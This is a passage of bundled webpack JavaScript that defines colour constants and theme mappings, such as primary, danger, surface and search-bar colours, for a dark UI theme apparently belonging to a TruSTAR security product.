var ACCENTS_POSITIVE = { "name": "accents_positive", "buttonText": "#FFF", "hex": "#118832", "X900": "#118832", "X800": "#118832", "X700": "#118832", "X600": "#118832", "X500": "#118832", "X400": "#118832", "X300": "#118832", "X200": "#118832", "X100": "#118832", "X50": "#118832" };
var ACCENTS_WARNING = { "name": "accents_warning", "buttonText": "#FFF", "hex": "#CCA700", "X900": "#CCA700", "X800": "#CCA700", "X700": "#CCA700", "X600": "#CCA700", "X500": "#CCA700", "X400": "#CCA700", "X300": "#CCA700", "X200": "#CCA700", "X100": "#CCA700", "X50": "#CCA700" };
var BACKGROUND_DIALOG = { "name": "background_dialog", "buttonText": "#FFF", "hex": "#FFFFFF", "X900": "#FFFFFF", "X800": "#FFFFFF", "X700": "#FFFFFF", "X600": "#FFFFFF", "X500": "#FFFFFF", "X400": "#FFFFFF", "X300": "#FFFFFF", "X200": "#FFFFFF", "X100": "#FFFFFF", "X50": "#FFFFFF" };
var BACKGROUND_FLOATING = { "name": "background_floating", "buttonText": "#FFF", "hex": "#000000", "X900": "#000000", "X800": "#000000", "X700": "#000000", "X600": "#000000", "X500": "#000000", "X400": "#000000", "X300": "#000000", "X200": "#000000", "X100": "#000000", "X50": "#000000" };
var BACKGROUND_NAVIGATION = { "name": "background_navigation", "buttonText": "#FFF", "hex": "#F6F6F6", "X900": "#F6F6F6", "X800": "#F6F6F6", "X700": "#F6F6F6", "X600": "#F6F6F6", "X500": "#F6F6F6", "X400": "#F6F6F6", "X300": "#F6F6F6", "X200": "#F6F6F6", "X100": "#F6F6F6", "X50": "#F6F6F6" };
var BACKGROUND_PAGE = { "name": "background_page", "buttonText": "#FFF", "hex": "#F9F9F9", "X900": "#F9F9F9", "X800": "#F9F9F9", "X700": "#F9F9F9", "X600": "#F9F9F9", "X500": "#F9F9F9", "X400": "#F9F9F9", "X300": "#F9F9F9", "X200": "#F9F9F9", "X100": "#F9F9F9", "X50": "#F9F9F9" };
var BACKGROUND_POPUP = { "name": "background_popup", "buttonText": "#FFF", "hex": "#FFFFFF", "X900": "#FFFFFF", "X800": "#FFFFFF", "X700": "#FFFFFF", "X600": "#FFFFFF", "X500": "#FFFFFF", "X400": "#FFFFFF", "X300": "#FFFFFF", "X200": "#FFFFFF", "X100": "#FFFFFF", "X50": "#FFFFFF" };
var BACKGROUND_SECTION = { "name": "background_section", "buttonText": "#FFF", "hex": "#FFFFFF", "X900": "#FFFFFF", "X800": "#FFFFFF", "X700": "#FFFFFF", "X600": "#FFFFFF", "X500": "#FFFFFF", "X400": "#FFFFFF", "X300": "#FFFFFF", "X200": "#FFFFFF", "X100": "#FFFFFF", "X50": "#FFFFFF" };
var BACKGROUND_SIDEBAR = { "name": "background_sidebar", "buttonText": "#FFF", "hex": "#F8F8F8", "X900": "#F8F8F8", "X800": "#F8F8F8", "X700": "#F8F8F8", "X600": "#F8F8F8", "X500": "#F8F8F8", "X400": "#F8F8F8", "X300": "#F8F8F8", "X200": "#F8F8F8", "X100": "#F8F8F8", "X50": "#F8F8F8" };
var CONTENT_ACTIVE = { "name": "content_active", "buttonText": "#FFF", "hex": "#2C2C2C", "X900": "#2C2C2C", "X800": "#2C2C2C", "X700": "#2C2C2C", "X600": "#2C2C2C", "X500": "#2C2C2C", "X400": "#2C2C2C", "X300": "#2C2C2C", "X200": "#2C2C2C", "X100": "#2C2C2C", "X50": "#2C2C2C" };
var CONTENT_DEFAULT = { "name": "content_default", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.65)", "X900": "rgba(0, 0, 0, 0.65)", "X800": "rgba(0, 0, 0, 0.65)", "X700": "rgba(0, 0, 0, 0.65)", "X600": "rgba(0, 0, 0, 0.65)", "X500": "rgba(0, 0, 0, 0.65)", "X400": "rgba(0, 0, 0, 0.65)", "X300": "rgba(0, 0, 0, 0.65)", "X200": "rgba(0, 0, 0, 0.65)", "X100": "rgba(0, 0, 0, 0.65)", "X50": "rgba(0, 0, 0, 0.65)" };
var CONTENT_DISABLED = { "name": "content_disabled", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.3)", "X900": "rgba(0, 0, 0, 0.3)", "X800": "rgba(0, 0, 0, 0.3)", "X700": "rgba(0, 0, 0, 0.3)", "X600": "rgba(0, 0, 0, 0.3)", "X500": "rgba(0, 0, 0, 0.3)", "X400": "rgba(0, 0, 0, 0.3)", "X300": "rgba(0, 0, 0, 0.3)", "X200": "rgba(0, 0, 0, 0.3)", "X100": "rgba(0, 0, 0, 0.3)", "X50": "rgba(0, 0, 0, 0.3)" };
var CONTENT_INVERTED = { "name": "content_inverted", "buttonText": "#FFF", "hex": "#FFFFFF", "X900": "#FFFFFF", "X800": "#FFFFFF", "X700": "#FFFFFF", "X600": "#FFFFFF", "X500": "#FFFFFF", "X400": "#FFFFFF", "X300": "#FFFFFF", "X200": "#FFFFFF", "X100": "#FFFFFF", "X50": "#FFFFFF" };
var CONTENT_MUTED = { "name": "content_muted", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.54)", "X900": "rgba(0, 0, 0, 0.54)", "X800": "rgba(0, 0, 0, 0.54)", "X700": "rgba(0, 0, 0, 0.54)", "X600": "rgba(0, 0, 0, 0.54)", "X500": "rgba(0, 0, 0, 0.54)", "X400": "rgba(0, 0, 0, 0.54)", "X300": "rgba(0, 0, 0, 0.54)", "X200": "rgba(0, 0, 0, 0.54)", "X100": "rgba(0, 0, 0, 0.54)", "X50": "rgba(0, 0, 0, 0.54)" };
var INTERACTIVE_ACTIVEOVERLAY = { "name": "interactive_activeOverlay", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.07)", "X900": "rgba(0, 0, 0, 0.07)", "X800": "rgba(0, 0, 0, 0.07)", "X700": "rgba(0, 0, 0, 0.07)", "X600": "rgba(0, 0, 0, 0.07)", "X500": "rgba(0, 0, 0, 0.07)", "X400": "rgba(0, 0, 0, 0.07)", "X300": "rgba(0, 0, 0, 0.07)", "X200": "rgba(0, 0, 0, 0.07)", "X100": "rgba(0, 0, 0, 0.07)", "X50": "rgba(0, 0, 0, 0.07)" };
var INTERACTIVE_DEFAULTBACKGROUND = { "name": "interactive_defaultBackground", "buttonText": "#FFF", "hex": "#EEEEEE", "X900": "#EEEEEE", "X800": "#EEEEEE", "X700": "#EEEEEE", "X600": "#EEEEEE", "X500": "#EEEEEE", "X400": "#EEEEEE", "X300": "#EEEEEE", "X200": "#EEEEEE", "X100": "#EEEEEE", "X50": "#EEEEEE" };
var INTERACTIVE_DEFAULTBORDER = { "name": "interactive_defaultBorder", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.4)", "X900": "rgba(0, 0, 0, 0.4)", "X800": "rgba(0, 0, 0, 0.4)", "X700": "rgba(0, 0, 0, 0.4)", "X600": "rgba(0, 0, 0, 0.4)", "X500": "rgba(0, 0, 0, 0.4)", "X400": "rgba(0, 0, 0, 0.4)", "X300": "rgba(0, 0, 0, 0.4)", "X200": "rgba(0, 0, 0, 0.4)", "X100": "rgba(0, 0, 0, 0.4)", "X50": "rgba(0, 0, 0, 0.4)" };
var INTERACTIVE_DESTRUCTIVEACTION = { "name": "interactive_destructiveAction", "buttonText": "#FFF", "hex": "#D41E1F", "X900": "#D41E1F", "X800": "#D41E1F", "X700": "#D41E1F", "X600": "#D41E1F", "X500": "#D41E1F", "X400": "#D41E1F", "X300": "#D41E1F", "X200": "#D41E1F", "X100": "#D41E1F", "X50": "#D41E1F" };
var INTERACTIVE_DESTRUCTIVEACTIONACTIVE = { "name": "interactive_destructiveActionActive", "buttonText": "#FFF", "hex": "#C41D1D", "X900": "#C41D1D", "X800": "#C41D1D", "X700": "#C41D1D", "X600": "#C41D1D", "X500": "#C41D1D", "X400": "#C41D1D", "X300": "#C41D1D", "X200": "#C41D1D", "X100": "#C41D1D", "X50": "#C41D1D" };
var INTERACTIVE_DISABLEDBACKGROUND = { "name": "interactive_disabledBackground", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.1)", "X900": "rgba(0, 0, 0, 0.1)", "X800": "rgba(0, 0, 0, 0.1)", "X700": "rgba(0, 0, 0, 0.1)", "X600": "rgba(0, 0, 0, 0.1)", "X500": "rgba(0, 0, 0, 0.1)", "X400": "rgba(0, 0, 0, 0.1)", "X300": "rgba(0, 0, 0, 0.1)", "X200": "rgba(0, 0, 0, 0.1)", "X100": "rgba(0, 0, 0, 0.1)", "X50": "rgba(0, 0, 0, 0.1)" };
var INTERACTIVE_DISABLEDBORDER = { "name": "interactive_disabledBorder", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.3)", "X900": "rgba(0, 0, 0, 0.3)", "X800": "rgba(0, 0, 0, 0.3)", "X700": "rgba(0, 0, 0, 0.3)", "X600": "rgba(0, 0, 0, 0.3)", "X500": "rgba(0, 0, 0, 0.3)", "X400": "rgba(0, 0, 0, 0.3)", "X300": "rgba(0, 0, 0, 0.3)", "X200": "rgba(0, 0, 0, 0.3)", "X100": "rgba(0, 0, 0, 0.3)", "X50": "rgba(0, 0, 0, 0.3)" };
var INTERACTIVE_FOCUSEDBORDER = { "name": "interactive_focusedBorder", "buttonText": "#FFF", "hex": "#1056A8", "X900": "#1056A8", "X800": "#1056A8", "X700": "#1056A8", "X600": "#1056A8", "X500": "#1056A8", "X400": "#1056A8", "X300": "#1056A8", "X200": "#1056A8", "X100": "#1056A8", "X50": "#1056A8" };
var INTERACTIVE_HOVERBORDER = { "name": "interactive_hoverBorder", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.6)", "X900": "rgba(0, 0, 0, 0.6)", "X800": "rgba(0, 0, 0, 0.6)", "X700": "rgba(0, 0, 0, 0.6)", "X600": "rgba(0, 0, 0, 0.6)", "X500": "rgba(0, 0, 0, 0.6)", "X400": "rgba(0, 0, 0, 0.6)", "X300": "rgba(0, 0, 0, 0.6)", "X200": "rgba(0, 0, 0, 0.6)", "X100": "rgba(0, 0, 0, 0.6)", "X50": "rgba(0, 0, 0, 0.6)" };
var INTERACTIVE_HOVEROVERLAY = { "name": "interactive_hoverOverlay", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.03)", "X900": "rgba(0, 0, 0, 0.03)", "X800": "rgba(0, 0, 0, 0.03)", "X700": "rgba(0, 0, 0, 0.03)", "X600": "rgba(0, 0, 0, 0.03)", "X500": "rgba(0, 0, 0, 0.03)", "X400": "rgba(0, 0, 0, 0.03)", "X300": "rgba(0, 0, 0, 0.03)", "X200": "rgba(0, 0, 0, 0.03)", "X100": "rgba(0, 0, 0, 0.03)", "X50": "rgba(0, 0, 0, 0.03)" };
var INTERACTIVE_DRAGOVERLAY = { "name": "interactive_dragOverlay", "buttonText": "#FFF", "hex": "rgba(2, 100, 215, 0.16)", "X900": "rgba(2, 100, 215, 0.16)", "X800": "rgba(2, 100, 215, 0.16)", "X700": "rgba(2, 100, 215, 0.16)", "X600": "rgba(2, 100, 215, 0.16)", "X500": "rgba(2, 100, 215, 0.16)", "X400": "rgba(2, 100, 215, 0.16)", "X300": "rgba(2, 100, 215, 0.16)", "X200": "rgba(2, 100, 215, 0.16)", "X100": "rgba(2, 100, 215, 0.16)", "X50": "rgba(2, 100, 215, 0.16)" };
var INTERACTIVE_PRIMARYACTION = { "name": "interactive_primaryAction", "buttonText": "#FFF", "hex": "#0264D7", "X900": "#0264D7", "X800": "#0264D7", "X700": "#0264D7", "X600": "#0264D7", "X500": "#0264D7", "X400": "#0264D7", "X300": "#0264D7", "X200": "#0264D7", "X100": "#0264D7", "X50": "#0264D7" };
var INTERACTIVE_PRIMARYACTIONACTIVE = { "name": "interactive_primaryActionActive", "buttonText": "#FFF", "hex": "#2F5DC7", "X900": "#2F5DC7", "X800": "#2F5DC7", "X700": "#2F5DC7", "X600": "#2F5DC7", "X500": "#2F5DC7", "X400": "#2F5DC7", "X300": "#2F5DC7", "X200": "#2F5DC7", "X100": "#2F5DC7", "X50": "#2F5DC7" };
var INTERACTIVE_SELECTEDBACKGROUNDINVERTED = { "name": "interactive_selectedBackgroundInverted", "buttonText": "#FFF", "hex": "#FFFFFF", "X900": "#FFFFFF", "X800": "#FFFFFF", "X700": "#FFFFFF", "X600": "#FFFFFF", "X500": "#FFFFFF", "X400": "#FFFFFF", "X300": "#FFFFFF", "X200": "#FFFFFF", "X100": "#FFFFFF", "X50": "#FFFFFF" };
var INTERACTIVE_SELECTEDOVERLAY = { "name": "interactive_selectedOverlay", "buttonText": "#FFF", "hex": "rgba(0, 0, 0, 0.04)", "X900": "rgba(0, 0, 0, 0.04)", "X800": "rgba(0, 0, 0, 0.04)", "X700": "rgba(0, 0, 0, 0.04)", "X600": "rgba(0, 0, 0, 0.04)", "X500": "rgba(0, 0, 0, 0.04)", "X400": "rgba(0, 0, 0, 0.04)", "X300": "rgba(0, 0, 0, 0.04)", "X200": "rgba(0, 0, 0, 0.04)", "X100": "rgba(0, 0, 0, 0.04)", "X50": "rgba(0, 0, 0, 0.04)" };
var NEUTRALS_GREY100 = { "name": "neutrals_grey100", "buttonText": "#FFF", "hex": "#F0F0F0", "X900": "#F0F0F0", "X800": "#F0F0F0", "X700": "#F0F0F0", "X600": "#F0F0F0", "X500": "#F0F0F0", "X400": "#F0F0F0", "X300": "#F0F0F0", "X200": "#F0F0F0", "X100": "#F0F0F0", "X50": "#F0F0F0" };
var NEUTRALS_GREY200 = { "name": "neutrals_grey200", "buttonText": "#FFF", "hex": "#E6E6E6", "X900": "#E6E6E6", "X800": "#E6E6E6", "X700": "#E6E6E6", "X600": "#E6E6E6", "X500": "#E6E6E6", "X400": "#E6E6E6", "X300": "#E6E6E6", "X200": "#E6E6E6", "X100": "#E6E6E6", "X50": "#E6E6E6" };
var NEUTRALS_GREY300 = { "name": "neutrals_grey300", "buttonText": "#FFF", "hex": "#DDDDDD", "X900": "#DDDDDD", "X800": "#DDDDDD", "X700": "#DDDDDD", "X600": "#DDDDDD", "X500": "#DDDDDD", "X400": "#DDDDDD", "X300": "#DDDDDD", "X200": "#DDDDDD", "X100": "#DDDDDD", "X50": "#DDDDDD" };
var NEUTRALS_GREY400 = { "name": "neutrals_grey400", "buttonText": "#FFF", "hex": "#CACACA", "X900": "#CACACA", "X800": "#CACACA", "X700": "#CACACA", "X600": "#CACACA", "X500": "#CACACA", "X400": "#CACACA", "X300": "#CACACA", "X200": "#CACACA", "X100": "#CACACA", "X50": "#CACACA" };
var NEUTRALS_GREY500 = { "name": "neutrals_grey500", "buttonText": "#FFF", "hex": "#B8B8B8", "X900": "#B8B8B8", "X800": "#B8B8B8", "X700": "#B8B8B8", "X600": "#B8B8B8", "X500": "#B8B8B8", "X400": "#B8B8B8", "X300": "#B8B8B8", "X200": "#B8B8B8", "X100": "#B8B8B8", "X50": "#B8B8B8" };
var NEUTRALS_WHITE = { "name": "neutrals_white", "buttonText": "#FFF", "hex": "#FFFFFF", "X900": "#FFFFFF", "X800": "#FFFFFF", "X700": "#FFFFFF", "X600": "#FFFFFF", "X500": "#FFFFFF", "X400": "#FFFFFF", "X300": "#FFFFFF", "X200": "#FFFFFF", "X100": "#FFFFFF", "X50": "#FFFFFF" };
var SCRIM_BACKGROUND = { "name": "scrim_background", "buttonText": "#FFF", "hex": "rgba(255, 255, 255, 0.75)", "X900": "rgba(255, 255, 255, 0.75)", "X800": "rgba(255, 255, 255, 0.75)", "X700": "rgba(255, 255, 255, 0.75)", "X600": "rgba(255, 255, 255, 0.75)", "X500": "rgba(255, 255, 255, 0.75)", "X400": "rgba(255, 255, 255, 0.75)", "X300": "rgba(255, 255, 255, 0.75)", "X200": "rgba(255, 255, 255, 0.75)", "X100": "rgba(255, 255, 255, 0.75)", "X50": "rgba(255, 255, 255, 0.75)" };
var STATUS_CRITICAL = { "name": "status_critical", "buttonText": "#FFF", "hex": "#9C0300", "X900": "#9C0300", "X800": "#9C0300", "X700": "#9C0300", "X600": "#9C0300", "X500": "#9C0300", "X400": "#9C0300", "X300": "#9C0300", "X200": "#9C0300", "X100": "#9C0300", "X50": "#9C0300" };
var STATUS_HIGH = { "name": "status_high", "buttonText": "#FFF", "hex": "#EC4B43", "X900": "#EC4B43", "X800": "#EC4B43", "X700": "#EC4B43", "X600": "#EC4B43", "X500": "#EC4B43", "X400": "#EC4B43", "X300": "#EC4B43", "X200": "#EC4B43", "X100": "#EC4B43", "X50": "#EC4B43" };
var STATUS_INFO = { "name": "status_info", "buttonText": "#FFF", "hex": "#61CAFA", "X900": "#61CAFA", "X800": "#61CAFA", "X700": "#61CAFA", "X600": "#61CAFA", "X500": "#61CAFA", "X400": "#61CAFA", "X300": "#61CAFA", "X200": "#61CAFA", "X100": "#61CAFA", "X50": "#61CAFA" };
var STATUS_LOW = { "name": "status_low", "buttonText": "#FFF", "hex": "#FAE75F", "X900": "#FAE75F", "X800": "#FAE75F", "X700": "#FAE75F", "X600": "#FAE75F", "X500": "#FAE75F", "X400": "#FAE75F", "X300": "#FAE75F", "X200": "#FAE75F", "X100": "#FAE75F", "X50": "#FAE75F" };
var STATUS_MEDIUM = { "name": "status_medium", "buttonText": "#FFF", "hex": "#F5B53F", "X900": "#F5B53F", "X800": "#F5B53F", "X700": "#F5B53F", "X600": "#F5B53F", "X500": "#F5B53F", "X400": "#F5B53F", "X300": "#F5B53F", "X200": "#F5B53F", "X100": "#F5B53F", "X50": "#F5B53F" };
var STATUS_NORMAL = { "name": "status_normal", "buttonText": "#FFF", "hex": "#85EB48", "X900": "#85EB48", "X800": "#85EB48", "X700": "#85EB48", "X600": "#85EB48", "X500": "#85EB48", "X400": "#85EB48", "X300": "#85EB48", "X200": "#85EB48", "X100": "#85EB48", "X50": "#85EB48" };
var BLUE = { "name": "blue", "buttonText": "#FFF", "hex": "#107D9F", "X900": "#107D9F", "X800": "#107D9F", "X700": "#107D9F", "X600": "#107D9F", "X500": "#107D9F", "X400": "#107D9F", "X300": "#107D9F", "X200": "#107D9F", "X100": "#107D9F", "X50": "#107D9F" };
var BROWN = { "name": "brown", "buttonText": "#FFF", "hex": "#A26604", "X900": "#A26604", "X800": "#A26604", "X700": "#A26604", "X600": "#A26604", "X500": "#A26604", "X400": "#A26604", "X300": "#A26604", "X200": "#A26604", "X100": "#A26604", "X50": "#A26604" };
var GREEN = { "name": "green", "buttonText": "#FFF", "hex": "#607D0D", "X900": "#607D0D", "X800": "#607D0D", "X700": "#607D0D", "X600": "#607D0D", "X500": "#607D0D", "X400": "#607D0D", "X300": "#607D0D", "X200": "#607D0D", "X100": "#607D0D", "X50": "#607D0D" };
var GREY = { "name": "grey", "buttonText": "#FFF", "hex": "#737373", "X900": "#737373", "X800": "#737373", "X700": "#737373", "X600": "#737373", "X500": "#737373", "X400": "#737373", "X300": "#737373", "X200": "#737373", "X100": "#737373", "X50": "#737373" };
var ORANGE = { "name": "orange", "buttonText": "#FFF", "hex": "#B75808", "X900": "#B75808", "X800": "#B75808", "X700": "#B75808", "X600": "#B75808", "X500": "#B75808", "X400": "#B75808", "X300": "#B75808", "X200": "#B75808", "X100": "#B75808", "X50": "#B75808" };
var PINK = { "name": "pink", "buttonText": "#FFF", "hex": "#D015B2", "X900": "#D015B2", "X800": "#D015B2", "X700": "#D015B2", "X600": "#D015B2", "X500": "#D015B2", "X400": "#D015B2", "X300": "#D015B2", "X200": "#D015B2", "X100": "#D015B2", "X50": "#D015B2" };
var PURPLE = { "name": "purple", "buttonText": "#FFF", "hex": "#7F52F5", "X900": "#7F52F5", "X800": "#7F52F5", "X700": "#7F52F5", "X600": "#7F52F5", "X500": "#7F52F5", "X400": "#7F52F5", "X300": "#7F52F5", "X200": "#7F52F5", "X100": "#7F52F5", "X50": "#7F52F5" };
var RED = { "name": "red", "buttonText": "#FFF", "hex": "#DF1F48", "X900": "#DF1F48", "X800": "#DF1F48", "X700": "#DF1F48", "X600": "#DF1F48", "X500": "#DF1F48", "X400": "#DF1F48", "X300": "#DF1F48", "X200": "#DF1F48", "X100": "#DF1F48", "X50": "#DF1F48" };
var TEAL = { "name": "teal", "buttonText": "#FFF", "hex": "#1E816F", "X900": "#1E816F", "X800": "#1E816F", "X700": "#1E816F", "X600": "#1E816F", "X500": "#1E816F", "X400": "#1E816F", "X300": "#1E816F", "X200": "#1E816F", "X100": "#1E816F", "X50": "#1E816F" };

// FIXME add to script, or same functionality
for (var color in colorManifest) {
  // $flowIgnore
  colorManifest[color].hover = __WEBPACK_IMPORTED_MODULE_0__common_util__["c" /* getHoverShade */];
}

/***/ }),
/* 3497 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Config", function() { return Config; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__themeColors__ = __webpack_require__(3498);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "ThemeColors", function() { return __WEBPACK_IMPORTED_MODULE_0__themeColors__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__common_colorNames__ = __webpack_require__(207);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "ColorNames", function() { return __WEBPACK_IMPORTED_MODULE_1__common_colorNames__; });






var Config = {
  name: 'Dark Theme',
  className: 'trustar-dark'
};

/***/ }),
/* 3498 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "PRIMARY", function() { return PRIMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SECONDARY", function() { return SECONDARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TERTIARY", function() { return TERTIARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BRAND_PRIMARY", function() { return BRAND_PRIMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BRAND_SECONDARY", function() { return BRAND_SECONDARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUCCESS", function() { return SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INFO", function() { return INFO; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WARNING", function() { return WARNING; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DANGER", function() { return DANGER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LIGHT", function() { return LIGHT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DARK", function() { return DARK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CONTRAST", function() { return CONTRAST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BLACK", function() { return BLACK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WHITE", function() { return WHITE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT", function() { return TEXT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT_ACTIVE", function() { return TEXT_ACTIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT_INVERSE", function() { return TEXT_INVERSE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LINK_TEXT", function() { return LINK_TEXT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE", function() { return SURFACE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DARK_SURFACE_LIGHTER", function() { return DARK_SURFACE_LIGHTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_INVERSE", function() { return SURFACE_INVERSE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_LIGHTER", function() { return SURFACE_LIGHTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_LIGHTEST", function() { return SURFACE_LIGHTEST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INPUT_DISABLED", function() { return INPUT_DISABLED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BOX_SHADOW", function() { return BOX_SHADOW; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER", function() { return BORDER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LIGHT_GRAY_SURFACE", function() { return LIGHT_GRAY_SURFACE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_RESULTS", function() { return SEARCH_RESULTS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_BAR", function() { return SEARCH_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_BAR_INPUT", function() { return SEARCH_BAR_INPUT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_FILTER_BAR", function() { return SEARCH_FILTER_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_FILTER_BAR_BUTTON", function() { return SEARCH_FILTER_BAR_BUTTON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_BAR", function() { return SIDE_NAV_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_BAR_HOVER", function() { return SIDE_NAV_BAR_HOVER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_DROPRIGHT_MENU_ITEM", function() { return SIDE_NAV_DROPRIGHT_MENU_ITEM; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SETTINGS_PAGE_NAVLINK", function() { return SETTINGS_PAGE_NAVLINK; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__common_colorNames__ = __webpack_require__(207);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__colorsText__ = __webpack_require__(3499);
// -ignore



var PRIMARY = __WEBPACK_IMPORTED_MODULE_1__colorsText__["k" /* INTERACTIVE_PRIMARYACTION */];
var SECONDARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var TERTIARY = Object.assign({}, __WEBPACK_IMPORTED_MODULE_1__colorsText__["n" /* NEUTRALS_WHITE */], {
  buttonText: __WEBPACK_IMPORTED_MODULE_1__colorsText__["k" /* INTERACTIVE_PRIMARYACTION */].hex
}); // Tertiary is always white button blue background
var BRAND_PRIMARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var BRAND_SECONDARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATOMIC_TANGERINE"];
var SUCCESS = __WEBPACK_IMPORTED_MODULE_1__colorsText__["b" /* ACCENTS_POSITIVE */];
var INFO = __WEBPACK_IMPORTED_MODULE_1__colorsText__["o" /* STATUS_INFO */];
var WARNING = __WEBPACK_IMPORTED_MODULE_1__colorsText__["c" /* ACCENTS_WARNING */];
var DANGER = __WEBPACK_IMPORTED_MODULE_1__colorsText__["a" /* ACCENTS_NEGATIVE */];
var LIGHT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var DARK = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];
var CONTRAST = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];
var BLACK = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["BLACK"];
var WHITE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"];
var TEXT = __WEBPACK_IMPORTED_MODULE_1__colorsText__["g" /* CONTENT_DEFAULT */];
var TEXT_ACTIVE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["f" /* CONTENT_ACTIVE */];
var TEXT_INVERSE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["h" /* CONTENT_INVERTED */];
var LINK_TEXT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var SURFACE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["d" /* BACKGROUND_PAGE */];
var DARK_SURFACE_LIGHTER = __WEBPACK_IMPORTED_MODULE_1__colorsText__["e" /* BACKGROUND_SECTION */];
var SURFACE_INVERSE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["i" /* GREY */];
var SURFACE_LIGHTER = __WEBPACK_IMPORTED_MODULE_1__colorsText__["e" /* BACKGROUND_SECTION */];
var SURFACE_LIGHTEST = __WEBPACK_IMPORTED_MODULE_1__colorsText__["e" /* BACKGROUND_SECTION */];
var INPUT_DISABLED = __WEBPACK_IMPORTED_MODULE_1__colorsText__["j" /* INTERACTIVE_DISABLEDBACKGROUND */];
var BOX_SHADOW = __WEBPACK_IMPORTED_MODULE_1__colorsText__["i" /* GREY */];

// export const BORDER = SplunkColors.INTERACTIVE_DEFAULTBORDER;
var BORDER = __WEBPACK_IMPORTED_MODULE_1__colorsText__["m" /* NEUTRALS_GREY400 */];

var LIGHT_GRAY_SURFACE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["l" /* NEUTRALS_GREY100 */];

/* -------------- Component Specific Styles -------------- */

// Search / Reports / Entities Page
var SEARCH_RESULTS = {
  TITLE: __WEBPACK_IMPORTED_MODULE_1__colorsText__["o" /* STATUS_INFO */].hex
};

var SEARCH_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var SEARCH_BAR_INPUT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var SEARCH_FILTER_BAR = __WEBPACK_IMPORTED_MODULE_1__colorsText__["e" /* BACKGROUND_SECTION */];
var SEARCH_FILTER_BAR_BUTTON = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];

// Side Nav Remains Black in Default
